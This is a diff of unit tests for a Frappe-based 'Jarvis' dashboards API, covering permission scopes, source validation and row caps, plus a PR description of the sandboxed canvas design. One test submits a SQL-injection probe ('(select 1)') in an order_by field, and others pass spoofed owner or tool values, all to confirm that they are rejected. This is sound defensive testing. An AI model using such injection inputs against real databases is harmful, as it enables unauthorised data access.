+		self.assertRaises(frappe.PermissionError, doc.save)
+
+	def test_admin_role_scope_with_untargetable_role_throws(self):
+		frappe.set_user(ADMIN_USER)
+		doc = frappe.get_doc({
+			"doctype": DASHBOARD,
+			"dashboard_title": f"gate-{frappe.generate_hash(length=8)}",
+			"scope": "Role",
+			"target_role": "System Manager",  # exists, but never targetable
+			"html": "<h1>x</h1>",
+		})
+		self.assertRaises(frappe.ValidationError, doc.insert)
+
+	def test_user_scope_autofill_and_scope_switch_clears_counterpart(self):
+		frappe.set_user(ADMIN_USER)
+		doc = frappe.get_doc({
+			"doctype": DASHBOARD,
+			"dashboard_title": f"gate-{frappe.generate_hash(length=8)}",
+			"scope": "Role",
+			"target_role": CUSTOM_ROLE,
+			"html": "<h1>x</h1>",
+		}).insert()
+		self._dashboards.append(doc.name)
+		self.assertFalse(doc.target_user)
+		doc.scope = "User"
+		doc.save()
+		self.assertEqual(doc.target_user, ADMIN_USER)  # auto-filled from owner
+		self.assertFalse(doc.target_role)  # cleared on the switch
+		doc.scope = "Org"
+		doc.save()
+		self.assertFalse(doc.target_user)
+		self.assertFalse(doc.target_role)

--- a/jarvis/tests/test_dashboard_permissions.py
+++ b/jarvis/tests/test_dashboard_permissions.py
@@ -297,3 +297,22 @@ class TestControllerScopeGate(_DashboardPermTestCase):
 		doc.save()
 		self.assertFalse(doc.target_user)
 		self.assertFalse(doc.target_role)
+
+	def test_user_scope_pins_target_user_to_owner_ignoring_client_value(self):
+		"""A direct REST/Desk write cannot push a User-scoped dashboard into an
+		arbitrary victim's list — target_user is always forced to the owner."""
+		frappe.set_user(PLAIN_A)
+		doc = frappe.get_doc({
+			"doctype": DASHBOARD,
+			"dashboard_title": f"pin-{frappe.generate_hash(length=8)}",
+			"scope": "User",
+			# attacker-supplied victim — must be ignored
+			"target_user": PLAIN_B,
+			"html": "<h1>x</h1>",
+		}).insert()
+		self._dashboards.append(doc.name)
+		self.assertEqual(doc.target_user, PLAIN_A)  # pinned to owner, not PLAIN_B
+		# and it is NOT visible to the intended victim
+		from jarvis.chat.dashboard_permissions import can_read_dashboard
+
+		self.assertFalse(can_read_dashboard(doc, PLAIN_B))

--- a/jarvis/tests/test_dashboards_api.py
+++ b/jarvis/tests/test_dashboards_api.py
@@ -1,0 +1,620 @@
+"""Tests for jarvis.chat.dashboards_api - the SPA-facing Dashboards endpoints.
+
+Fixture users: a Jarvis Admin, two plain jarvis users, plus Administrator as
+the SM tier. A hermetic Query Report fixture (over ToDo) backs the run_report
+paths. Every dashboard / ToDo / conversation created here is tracked and
+deleted in tearDown; no LLM/network calls anywhere on these paths.
+"""
+
+from unittest.mock import patch
+
+import frappe
+from frappe.tests.utils import FrappeTestCase
+
+from jarvis.chat.api import search_workspace, send_message
+from jarvis.chat.dashboards_api import (
+	delete_dashboard,
+	get_dashboard,
+	get_dashboards_caps,
+	list_dashboards_page,
+	run_dashboard_source,
+	save_dashboard,
+)
+from jarvis.permissions import (
+	JARVIS_ADMIN_ROLE,
+	JARVIS_USER_ROLE,
+	ensure_jarvis_admin_role,
+	ensure_jarvis_user_role,
+)
+
+DASHBOARD = "Jarvis Dashboard"
+
+ADMIN_USER = "jarvis-dashapi-admin@example.com"
+PLAIN_A = "jarvis-dashapi-user-a@example.com"
+PLAIN_B = "jarvis-dashapi-user-b@example.com"
+CUSTOM_ROLE = "Jarvis Dash Test Role"
+
+REPORT_NAME = "Jarvis Dash Test Report"
+PREPARED_REPORT_NAME = "Jarvis Dash Prepared Report"
+
+_GET_LIST_SPEC = {"doctype": "ToDo", "fields": ["name", "description"], "limit": 10}
+
+_HTML_WITH_BLOCK = (
+	'<div id="app"></div>\n'
+	'<script type="application/json" id="jarvis-sources">'
+	'{"sources": [{"source_name": "todos", "tool": "get_list", '
+	'"spec": {"doctype": "ToDo", "fields": ["name", "description"], "limit": 10}}]}'
+	"</script>"
+)
+
+
+def _ensure_user(email: str, roles: list[str]) -> None:
+	"""Create the fixture user if missing; idempotent."""
+	if not frappe.db.exists("User", email):
+		frappe.get_doc({
+			"doctype": "User",
+			"email": email,
+			"first_name": "DashApi",
+			"last_name": "Test",
+			"enabled": 1,
+			"send_welcome_email": 0,
+			"user_type": "System User",
+		}).insert(ignore_permissions=True)
+	doc = frappe.get_doc("User", email)
+	doc.add_roles(*roles)
+	frappe.db.commit()
+
+
+def _ensure_custom_role() -> None:
+	if not frappe.db.exists("Role", CUSTOM_ROLE):
+		frappe.get_doc({
+			"doctype": "Role",
+			"role_name": CUSTOM_ROLE,
+			"desk_access": 1,
+			"is_custom": 1,
+		}).insert(ignore_permissions=True)
+
+
+def _ensure_report(name: str, prepared: int) -> None:
+	"""Hermetic Query Report over ToDo (is_standard No, runs inline unless
+	``prepared``). Idempotent; left in place across tests like the roles."""
+	if frappe.db.exists("Report", name):
+		return
+	frappe.get_doc({
+		"doctype": "Report",
+		"report_name": name,
+		"ref_doctype": "ToDo",
+		"report_type": "Query Report",
+		"is_standard": "No",
+		"query": "select name, description from `tabToDo` order by creation desc limit 5",
+		"prepared_report": prepared,
+		"disabled": 0,
+	}).insert(ignore_permissions=True)
+
+
+class _DashboardsApiTestCase(FrappeTestCase):
+	def setUp(self):
+		ensure_jarvis_user_role()
+		ensure_jarvis_admin_role()
+		_ensure_custom_role()
+		_ensure_user(ADMIN_USER, [JARVIS_ADMIN_ROLE, JARVIS_USER_ROLE, CUSTOM_ROLE])
+		_ensure_user(PLAIN_A, [JARVIS_USER_ROLE])
+		_ensure_user(PLAIN_B, [JARVIS_USER_ROLE])
+		_ensure_report(REPORT_NAME, prepared=0)
+		_ensure_report(PREPARED_REPORT_NAME, prepared=1)
+		frappe.db.commit()
+		self._orig_user = frappe.session.user
+		self._dashboards: list[str] = []
+		self._todos: list[str] = []
+		self._convs: list[str] = []
+
+	def tearDown(self):
+		frappe.set_user(self._orig_user)
+		for name in self._dashboards:
+			if frappe.db.exists(DASHBOARD, name):
+				frappe.delete_doc(DASHBOARD, name, ignore_permissions=True, force=True)
+		for name in self._todos:
+			if frappe.db.exists("ToDo", name):
+				frappe.delete_doc("ToDo", name, ignore_permissions=True, force=True)
+		for name in self._convs:
+			frappe.db.delete("Jarvis Chat Message", {"conversation": name})
+			if frappe.db.exists("Jarvis Conversation", name):
+				frappe.delete_doc(
+					"Jarvis Conversation", name, ignore_permissions=True, force=True
+				)
+		frappe.db.commit()
+
+	def _save(self, payload: dict) -> dict:
+		r = save_dashboard(frappe.as_json(payload))
+		self._dashboards.append(r["data"]["name"])
+		return r["data"]
+
+	def _mk_static(self, user: str, title: str | None = None, **extra) -> dict:
+		frappe.set_user(user)
+		return self._save({
+			"dashboard_title": title or f"dash-{frappe.generate_hash(length=8)}",
+			"html": "<h1>hello</h1>",
+			**extra,
+		})
+
+	def _mk_connected(self, user: str, sources: list, title: str | None = None) -> dict:
+		frappe.set_user(user)
+		return self._save({
+			"dashboard_title": title or f"dash-{frappe.generate_hash(length=8)}",
+			"html": "<h1>data</h1>",
+			"sources": sources,
+		})
+
+	def _mk_todo(self, user: str, description: str = "dash test todo") -> str:
+		todo = frappe.get_doc({
+			"doctype": "ToDo", "description": description, "allocated_to": user,
+		}).insert(ignore_permissions=True)
+		self._todos.append(todo.name)
+		frappe.db.commit()
+		return todo.name
+
+
+class TestCaps(_DashboardsApiTestCase):
+	def test_caps_shape_plain_vs_admin(self):
+		frappe.set_user(PLAIN_A)
+		data = get_dashboards_caps()["data"]
+		self.assertEqual(data["creatable_scopes"], ["User"])
+		self.assertEqual(data["manageable_roles"], [])
+		self.assertEqual(data["max_sources"], 12)
+		self.assertEqual(data["max_html_chars"], 1_000_000)
+		self.assertEqual(data["max_rows"], 2000)
+		self.assertIn(data["canvas_available"], (True, False))
+		frappe.set_user(ADMIN_USER)
+		data = get_dashboards_caps()["data"]
+		self.assertEqual(data["creatable_scopes"], ["Org", "Role", "User"])
+		self.assertIn(CUSTOM_ROLE, data["manageable_roles"])
+
+
+class TestDashboardList(_DashboardsApiTestCase):
+	def test_list_envelope_and_pagination(self):
+		prefix = f"page-{frappe.generate_hash(length=6)}"
+		for i in range(3):
+			self._mk_static(PLAIN_A, title=f"{prefix} {i}")
+		frappe.set_user(PLAIN_A)
+		page = list_dashboards_page(search=prefix, page_length=2)["data"]
+		self.assertEqual(page["total"], 3)
+		self.assertEqual(len(page["rows"]), 2)
+		self.assertTrue(page["has_more"])
+		self.assertEqual(page["start"], 0)
+		self.assertEqual(page["page_length"], 2)
+		page = list_dashboards_page(search=prefix, start=2, page_length=2)["data"]
+		self.assertEqual(len(page["rows"]), 1)
+		self.assertFalse(page["has_more"])
+
+	def test_search_by_title(self):
+		needle = f"needle-{frappe.generate_hash(length=6)}"
+		self._mk_static(PLAIN_A, title=f"{needle} sales")
+		self._mk_static(PLAIN_A)
+		frappe.set_user(PLAIN_A)
+		page = list_dashboards_page(search=needle)["data"]
+		self.assertEqual(page["total"], 1)
+		self.assertEqual(page["rows"][0]["dashboard_title"], f"{needle} sales")
+		self.assertIsInstance(page["rows"][0]["modified"], str)
+
+	def test_filters_scope_type_owner(self):
+		prefix = f"filt-{frappe.generate_hash(length=6)}"
+		self._mk_static(PLAIN_A, title=f"{prefix} mine")
+		self._mk_connected(
+			ADMIN_USER,
+			[{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}],
+			title=f"{prefix} connected",
+		)
+		frappe.set_user(ADMIN_USER)
+		page = list_dashboards_page(
+			search=prefix,
+			filters=frappe.as_json({"scope": "User", "owner": PLAIN_A}),
+		)["data"]
+		self.assertEqual([r["dashboard_title"] for r in page["rows"]], [f"{prefix} mine"])
+		page = list_dashboards_page(
+			search=prefix, filters=frappe.as_json({"dashboard_type": "Connected"})
+		)["data"]
+		self.assertEqual(
+			[r["dashboard_title"] for r in page["rows"]], [f"{prefix} connected"]
+		)
+		self.assertRaises(
+			frappe.ValidationError,
+			list_dashboards_page,
+			filters=frappe.as_json({"scope": "Bogus"}),
+		)
+
+	def test_unknown_filter_key_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			list_dashboards_page,
+			filters=frappe.as_json({"bogus": 1}),
+		)
+
+	def test_unknown_sort_field_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError, list_dashboards_page, sort_field="html"
+		)
+
+	def test_list_visibility_excludes_others_private(self):
+		prefix = f"vis-{frappe.generate_hash(length=6)}"
+		self._mk_static(PLAIN_A, title=f"{prefix} private")
+		frappe.set_user(PLAIN_B)
+		page = list_dashboards_page(search=prefix)["data"]
+		self.assertEqual(page["total"], 0)
+		self.assertEqual(page["rows"], [])
+		# The admin tier sees it (no visibility splice).
+		frappe.set_user(ADMIN_USER)
+		page = list_dashboards_page(search=prefix)["data"]
+		self.assertEqual(page["total"], 1)
+
+
+class TestDashboardDetail(_DashboardsApiTestCase):
+	def test_get_dashboard_detail(self):
+		created = self._mk_connected(
+			PLAIN_A, [{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}]
+		)
+		detail = get_dashboard(created["name"])["data"]
+		self.assertEqual(detail["name"], created["name"])
+		self.assertEqual(detail["dashboard_type"], "Connected")
+		self.assertEqual(detail["scope"], "User")
+		self.assertEqual(detail["target_user"], PLAIN_A)
+		self.assertEqual(detail["owner"], PLAIN_A)
+		self.assertEqual(detail["html"], "<h1>data</h1>")
+		self.assertEqual(len(detail["sources"]), 1)
+		self.assertEqual(detail["sources"][0]["source_name"], "todos")
+		self.assertEqual(detail["sources"][0]["tool"], "get_list")
+		self.assertEqual(frappe.parse_json(detail["sources"][0]["spec"]), _GET_LIST_SPEC)
+		self.assertIsInstance(detail["modified"], str)
+		self.assertTrue(detail["can_edit"])  # owner
+
+	def test_get_dashboard_denied_and_missing(self):
+		created = self._mk_static(PLAIN_A)
+		frappe.set_user(PLAIN_B)
+		self.assertRaises(frappe.PermissionError, get_dashboard, created["name"])
+		frappe.clear_messages()
+		self.assertRaises(frappe.DoesNotExistError, get_dashboard, "no-such-dash-zz")
+
+
+class TestSaveDashboard(_DashboardsApiTestCase):
+	def test_save_create_static_minimal(self):
+		data = self._mk_static(PLAIN_A)
+		self.assertEqual(data["dashboard_type"], "Static")
+		self.assertEqual(data["scope"], "User")
+		self.assertEqual(data["target_user"], PLAIN_A)  # auto-filled
+		self.assertEqual(data["owner"], PLAIN_A)
+		self.assertEqual(data["sources"], [])
+
+	def test_save_connected_explicit_sources_roundtrip(self):
+		data = self._mk_connected(
+			PLAIN_A, [{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}]
+		)
+		self.assertEqual(data["dashboard_type"], "Connected")
+		self.assertEqual(len(data["sources"]), 1)
+		self.assertIsInstance(data["sources"][0]["spec"], str)
+		self.assertEqual(frappe.parse_json(data["sources"][0]["spec"]), _GET_LIST_SPEC)
+
+	def test_save_parses_jarvis_sources_block_from_html(self):
+		frappe.set_user(PLAIN_A)
+		data = self._save({
+			"dashboard_title": f"block-{frappe.generate_hash(length=8)}",
+			"html": _HTML_WITH_BLOCK,
+		})
+		self.assertEqual(data["dashboard_type"], "Connected")
+		self.assertEqual([s["source_name"] for s in data["sources"]], ["todos"])
+		self.assertEqual(frappe.parse_json(data["sources"][0]["spec"]), _GET_LIST_SPEC)
+
+	def test_unknown_payload_key_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({"dashboard_title": "x", "html": "<p>x</p>", "owner": "evil"}),
+		)
+
+	def test_bad_tool_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{"source_name": "s", "tool": "run_sql", "spec": {}}],
+			}),
+		)
+
+	def test_non_json_spec_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{"source_name": "s", "tool": "get_list", "spec": "{not json"}],
+			}),
+		)
+
+	def test_bad_query_spec_invalid_op_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{
+					"source_name": "s", "tool": "query",
+					"spec": {
+						"from": "ToDo",
+						"where": [{"field": "status", "op": "regexp", "value": "x"}],
+					},
+				}],
+			}),
+		)
+
+	def test_get_list_unknown_doctype_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{
+					"source_name": "s", "tool": "get_list",
+					"spec": {"doctype": "No Such Doctype Zzz"},
+				}],
+			}),
+		)
+
+	def test_run_report_unknown_report_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{
+					"source_name": "s", "tool": "run_report",
+					"spec": {"report_name": "No Such Report Zzz"},
+				}],
+			}),
+		)
+
+	def test_run_report_prepared_report_rejected(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{
+					"source_name": "s", "tool": "run_report",
+					"spec": {"report_name": PREPARED_REPORT_NAME},
+				}],
+			}),
+		)
+
+	def test_spec_over_32k_throws(self):
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{"source_name": "s", "tool": "get_list", "spec": "x" * 33_000}],
+			}),
+		)
+
+	def test_more_than_12_sources_throws(self):
+		frappe.set_user(PLAIN_A)
+		sources = [
+			{"source_name": f"s{i}", "tool": "get_list", "spec": _GET_LIST_SPEC}
+			for i in range(13)
+		]
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json(
+				{"dashboard_title": "x", "html": "<p>x</p>", "sources": sources}
+			),
+		)
+
+	def test_duplicate_source_name_throws(self):
+		frappe.set_user(PLAIN_A)
+		sources = [
+			{"source_name": "dup", "tool": "get_list", "spec": _GET_LIST_SPEC},
+			{"source_name": "dup", "tool": "get_list", "spec": _GET_LIST_SPEC},
+		]
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json(
+				{"dashboard_title": "x", "html": "<p>x</p>", "sources": sources}
+			),
+		)
+
+	def test_update_by_non_owner_denied(self):
+		created = self._mk_static(PLAIN_A)
+		frappe.set_user(PLAIN_B)
+		self.assertRaises(
+			frappe.PermissionError,
+			save_dashboard,
+			frappe.as_json({"name": created["name"], "html": "<h1>hijack</h1>"}),
+		)
+
+	def test_owner_update_mutates_html(self):
+		created = self._mk_static(PLAIN_A)
+		frappe.set_user(PLAIN_A)
+		updated = save_dashboard(
+			frappe.as_json({"name": created["name"], "html": "<h1>v2</h1>"})
+		)["data"]
+		self.assertEqual(updated["html"], "<h1>v2</h1>")
+		self.assertEqual(updated["name"], created["name"])
+
+	def test_delete_matrix(self):
+		mine = self._mk_static(PLAIN_A)
+		frappe.set_user(PLAIN_B)
+		self.assertRaises(frappe.PermissionError, delete_dashboard, mine["name"])
+		frappe.set_user(PLAIN_A)
+		r = delete_dashboard(mine["name"])
+		self.assertEqual(r["data"], {"deleted": mine["name"]})
+		self.assertFalse(frappe.db.exists(DASHBOARD, mine["name"]))
+		# A Jarvis Admin may delete someone else's.
+		other = self._mk_static(PLAIN_A)
+		frappe.set_user(ADMIN_USER)
+		self.assertTrue(delete_dashboard(other["name"])["ok"])
+		self.assertFalse(frappe.db.exists(DASHBOARD, other["name"]))
+
+
+class TestRunDashboardSource(_DashboardsApiTestCase):
+	def test_get_list_happy_path_envelope(self):
+		self._mk_todo(PLAIN_A)
+		created = self._mk_connected(
+			PLAIN_A, [{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}]
+		)
+		r = run_dashboard_source(created["name"], "todos")
+		self.assertTrue(r["ok"])
+		data = r["data"]
+		self.assertEqual(data["source_name"], "todos")
+		self.assertEqual(data["tool"], "get_list")
+		self.assertIsInstance(data["rows"], list)
+		self.assertTrue(data["rows"])
+		self.assertFalse(data["truncated"])
+		self.assertIsInstance(data["took_ms"], int)
+		self.assertNotIn("columns", data)
+
+	def test_unknown_source_clean_error(self):
+		created = self._mk_connected(
+			PLAIN_A, [{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}]
+		)
+		r = run_dashboard_source(created["name"], "nope")
+		self.assertFalse(r["ok"])
+		self.assertEqual(r["error"]["code"], "InvalidArgumentError")
+		self.assertIn("nope", r["error"]["message"])
+
+	def test_dashboard_read_denied_error(self):
+		created = self._mk_connected(
+			PLAIN_A, [{"source_name": "todos", "tool": "get_list", "spec": _GET_LIST_SPEC}]
+		)
+		frappe.set_user(PLAIN_B)
+		frappe.clear_messages()
+		r = run_dashboard_source(created["name"], "todos")
+		self.assertFalse(r["ok"])
+		self.assertEqual(r["error"]["code"], "PermissionError")
+		self.assertFalse(getattr(frappe.local, "message_log", None))
+
+	def test_in_tool_permission_error_no_leak(self):
+		# Server Script is SM-only: the SAVE succeeds (the spec only checks the
+		# doctype exists) but the RUN, as the viewing user, must deny cleanly.
+		created = self._mk_connected(
+			PLAIN_A,
+			[{
+				"source_name": "scripts", "tool": "get_list",
+				"spec": {"doctype": "Server Script", "limit": 5},
+			}],
+		)
+		frappe.set_user(PLAIN_A)
+		frappe.clear_messages()
+		r = run_dashboard_source(created["name"], "scripts")
+		self.assertFalse(r["ok"])
+		self.assertEqual(r["error"]["code"], "PermissionError")
+		self.assertFalse(getattr(frappe.local, "message_log", None))
+
+	def test_run_report_happy_path_normalized(self):
+		self._mk_todo("Administrator")
+		frappe.set_user("Administrator")
+		created = self._save({
+			"dashboard_title": f"rep-{frappe.generate_hash(length=8)}",
+			"html": "<h1>report</h1>",
+			"sources": [{
+				"source_name": "rep", "tool": "run_report",
+				"spec": {"report_name": REPORT_NAME},
+			}],
+		})
+		r = run_dashboard_source(created["name"], "rep")
+		self.assertTrue(r["ok"])
+		data = r["data"]
+		self.assertEqual(data["tool"], "run_report")
+		self.assertIn("columns", data)
+		self.assertIsInstance(data["columns"], list)
+		self.assertIsInstance(data["rows"], list)
+		self.assertTrue(data["rows"])
+		self.assertIsInstance(data["took_ms"], int)
+
+	def test_truncation_cap(self):
+		self._mk_todo("Administrator", "truncate one")
+		self._mk_todo("Administrator", "truncate two")
+		frappe.set_user("Administrator")
+		created = self._save({
+			"dashboard_title": f"cap-{frappe.generate_hash(length=8)}",
+			"html": "<h1>cap</h1>",
+			"sources": [{
+				"source_name": "todos", "tool": "get_list",
+				"spec": {"doctype": "ToDo", "fields": ["name"], "limit": 100},
+			}],
+		})
+		with patch("jarvis.chat.dashboards_api.DASHBOARD_MAX_ROWS", 1):
+			r = run_dashboard_source(created["name"], "todos")
+		self.assertTrue(r["ok"])
+		self.assertEqual(len(r["data"]["rows"]), 1)
+		self.assertTrue(r["data"]["truncated"])
+
+	def test_response_never_contains_sql(self):
+		# Administrator: ToDo's core permission_query_conditions hook writes a
+		# literal `tabToDo`.allocated_to predicate that breaks under the query
+		# tool's FROM alias for non-admin users (a pre-existing query-tool
+		# limitation, surfaced as an InternalError envelope) — the sql-leak
+		# assertion needs a user whose run actually succeeds.
+		self._mk_todo("Administrator")
+		created = self._mk_connected(
+			"Administrator",
+			[{
+				"source_name": "q", "tool": "query",
+				"spec": {"from": "ToDo", "select": ["name"], "limit": 5},
+			}],
+		)
+		r = run_dashboard_source(created["name"], "q")
+		self.assertTrue(r["ok"])
+		self.assertNotIn("sql", r["data"])
+		self.assertNotIn('"sql"', frappe.as_json(r))
+
+
+class TestWorkspaceSearchAndContext(_DashboardsApiTestCase):
+	def test_search_workspace_dashboard_hit(self):
+		marker = f"zzdashfind{frappe.generate_hash(length=6)}"
+		mine = self._mk_static(PLAIN_A, title=f"{marker} alpha")
+		theirs = self._mk_static(PLAIN_B, title=f"{marker} secret")
+		frappe.set_user(PLAIN_A)
+		groups = search_workspace(search=marker)["groups"]
+		dash = next((g for g in groups if g["key"] == "dashboards"), None)
+		self.assertIsNotNone(dash)
+		self.assertEqual(dash["title"], "Dashboards")
+		names = [i["name"] for i in dash["items"]]
+		self.assertIn(f"dashboard::{mine['name']}", names)
+		self.assertNotIn(f"dashboard::{theirs['name']}", names)
+		item = next(i for i in dash["items"] if i["name"] == f"dashboard::{mine['name']}")
+		self.assertEqual(item["suffix"], "Dashboard")
+		self.assertEqual(item["spa_route"], f"/dashboards/{mine['name']}")
+		self.assertNotIn("route", item)
+
+	def test_send_message_context_dashboards_allowlist(self):
+		frappe.set_user(PLAIN_A)
+		conv = frappe.get_doc({
+			"doctype": "Jarvis Conversation", "title": "dash ctx test",
+		}).insert(ignore_permissions=True)
+		self._convs.append(conv.name)
+		with patch("jarvis.chat.api.validate_can_send", return_value=(True, "")), \
+		     patch("jarvis.chat.api._dispatch_turn") as disp:
+			r = send_message(
+				conv.name, "build me a dashboard",
+				context=frappe.as_json({"page": "dashboards"}),
+			)
+			self.assertTrue(r["ok"])
+			kwargs = disp.call_args[0][0]
+			self.assertEqual(kwargs["context"]["page"], "dashboards")
+			# A page value outside the allow-list forwards NO context at all.
+			r2 = send_message(
+				conv.name, "hello again",
+				context=frappe.as_json({"page": "evil"}),
+			)
+			self.assertTrue(r2["ok"])
+			self.assertNotIn("context", disp.call_args[0][0])

--- a/jarvis/tests/test_dashboards_api.py
+++ b/jarvis/tests/test_dashboards_api.py
@@ -638,3 +638,40 @@ class TestWorkspaceSearchAndContext(_DashboardsApiTestCase):
 			)
 			self.assertTrue(r2["ok"])
 			self.assertNotIn("context", disp.call_args[0][0])
+			# Explicit data-mode toggle: the two literal values forward; junk
+			# does not.
+			r3 = send_message(
+				conv.name, "make it live",
+				context=frappe.as_json({"page": "dashboards", "data_mode": "live"}),
+			)
+			self.assertTrue(r3["ok"])
+			self.assertEqual(disp.call_args[0][0]["context"]["data_mode"], "live")
+			r4 = send_message(
+				conv.name, "make it weird",
+				context=frappe.as_json({"page": "dashboards", "data_mode": "weird"}),
+			)
+			self.assertTrue(r4["ok"])
+			self.assertNotIn("data_mode", disp.call_args[0][0]["context"])
+
+	def test_theme_roundtrip_and_validation(self):
+		frappe.set_user(PLAIN_A)
+		data = self._save({
+			"dashboard_title": f"theme-{frappe.generate_hash(length=8)}",
+			"html": "<p>x</p>",
+			"theme": "Claude",
+		})
+		self.assertEqual(data["theme"], "Claude")
+		# omitted -> the Jarvis design-language default
+		data2 = self._save({
+			"dashboard_title": f"theme-{frappe.generate_hash(length=8)}",
+			"html": "<p>x</p>",
+		})
+		self.assertEqual(data2["theme"], "Jarvis")
+		# invalid value throws
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>", "theme": "Neon",
+			}),
+		)

--- a/jarvis/tests/test_dashboards_api.py
+++ b/jarvis/tests/test_dashboards_api.py
@@ -653,6 +653,20 @@ class TestWorkspaceSearchAndContext(_DashboardsApiTestCase):
 			self.assertTrue(r4["ok"])
 			self.assertNotIn("data_mode", disp.call_args[0][0]["context"])
 
+	def test_save_unwraps_double_nested_spec(self):
+		"""The LLM sometimes wraps the tool's kwargs shape into spec
+		({"spec": {"spec": {...}}}); save folds it to the bare argument value."""
+		frappe.set_user(PLAIN_A)
+		data = self._save({
+			"dashboard_title": f"nest-{frappe.generate_hash(length=8)}",
+			"html": "<p>x</p>",
+			"sources": [{
+				"source_name": "todos", "tool": "get_list",
+				"spec": {"spec": dict(_GET_LIST_SPEC)},
+			}],
+		})
+		self.assertEqual(frappe.parse_json(data["sources"][0]["spec"]), _GET_LIST_SPEC)
+
 	def test_theme_roundtrip_and_validation(self):
 		frappe.set_user(PLAIN_A)
 		data = self._save({

--- a/jarvis/tests/test_dashboards_api.py
+++ b/jarvis/tests/test_dashboards_api.py
@@ -304,6 +304,26 @@ class TestSaveDashboard(_DashboardsApiTestCase):
 		self.assertEqual([s["source_name"] for s in data["sources"]], ["todos"])
 		self.assertEqual(frappe.parse_json(data["sources"][0]["spec"]), _GET_LIST_SPEC)
 
+	def test_save_normalizes_llm_source_dialect(self):
+		"""LLM-authored blocks drift toward the tool-call surface: ``id`` for
+		source_name, a ``jarvis__`` tool prefix, ``args``/``args.spec`` for
+		spec. Save folds them into the canonical child-row shape."""
+		frappe.set_user(PLAIN_A)
+		html = (
+			'<script type="application/json" id="jarvis-sources">'
+			'{"sources": [{"id": "todos", "tool": "jarvis__get_list", "refresh": "view", '
+			'"args": {"spec": {"doctype": "ToDo", "fields": ["name", "description"], "limit": 10}}}]}'
+			"</script>"
+		)
+		data = self._save({
+			"dashboard_title": f"dialect-{frappe.generate_hash(length=8)}",
+			"html": html,
+		})
+		self.assertEqual(data["dashboard_type"], "Connected")
+		self.assertEqual([s["source_name"] for s in data["sources"]], ["todos"])
+		self.assertEqual(data["sources"][0]["tool"], "get_list")
+		self.assertEqual(frappe.parse_json(data["sources"][0]["spec"]), _GET_LIST_SPEC)
+
 	def test_unknown_payload_key_throws(self):
 		frappe.set_user(PLAIN_A)
 		self.assertRaises(

--- a/jarvis/tests/test_dashboards_api.py
+++ b/jarvis/tests/test_dashboards_api.py
@@ -399,6 +399,34 @@ class TestSaveDashboard(_DashboardsApiTestCase):
 			}),
 		)
 
+	def test_get_list_bad_order_by_throws(self):
+		"""order_by is passed straight to frappe.get_list; a non fieldname-token
+		value (injection attempt) must be rejected at save."""
+		frappe.set_user(PLAIN_A)
+		self.assertRaises(
+			frappe.ValidationError,
+			save_dashboard,
+			frappe.as_json({
+				"dashboard_title": "x", "html": "<p>x</p>",
+				"sources": [{
+					"source_name": "s", "tool": "get_list",
+					"spec": {"doctype": "ToDo", "order_by": "(select 1)"},
+				}],
+			}),
+		)
+
+	def test_get_list_good_order_by_saves(self):
+		frappe.set_user(PLAIN_A)
+		data = self._save({
+			"dashboard_title": f"ob-{frappe.generate_hash(length=8)}",
+			"html": "<p>x</p>",
+			"sources": [{
+				"source_name": "s", "tool": "get_list",
+				"spec": {"doctype": "ToDo", "order_by": "modified desc"},
+			}],
+		})
+		self.assertEqual(data["sources"][0]["source_name"], "s")
+
 	def test_run_report_prepared_report_rejected(self):
 		frappe.set_user(PLAIN_A)
 		self.assertRaises(


### PR DESCRIPTION
## Dashboard Builder — canvas-and-chat reports

Adds a **Dashboards** feature reached from a new sidebar **More** popup: an AI-built HTML canvas over an embedded chat. Users describe a report; Jarvis draws it. Two kinds:

- **Static / one-time report** — data baked in, exportable as **PNG** or a faithful **slides-PDF** (one page per `section.slide`).
- **Live data-connected report** — saved and viewed later; its JS fetches data at view time **only** through the permission-bounded jarvis query tools.

Saved dashboards are scoped **User / Role / Org**, searchable from the command palette + More popup, and referrable in chat ("Discuss in chat").

### How data stays safe
- The canvas renders in `<iframe sandbox="allow-scripts">` (no same-origin, no popups) with an injected CSP (`default-src 'none'; connect-src 'none'; img-src data: blob:`) that blocks **all** network egress. Data enters only via a `postMessage` bridge.
- **View mode runs only server-stored named sources** (`run_dashboard_source(dashboard, source_name)` — no spec parameter), executed as the **viewing user** through the query-builder tools (no SQL). A shared dashboard can never carry a viewer-supplied query, and every viewer sees only their own permitted rows.
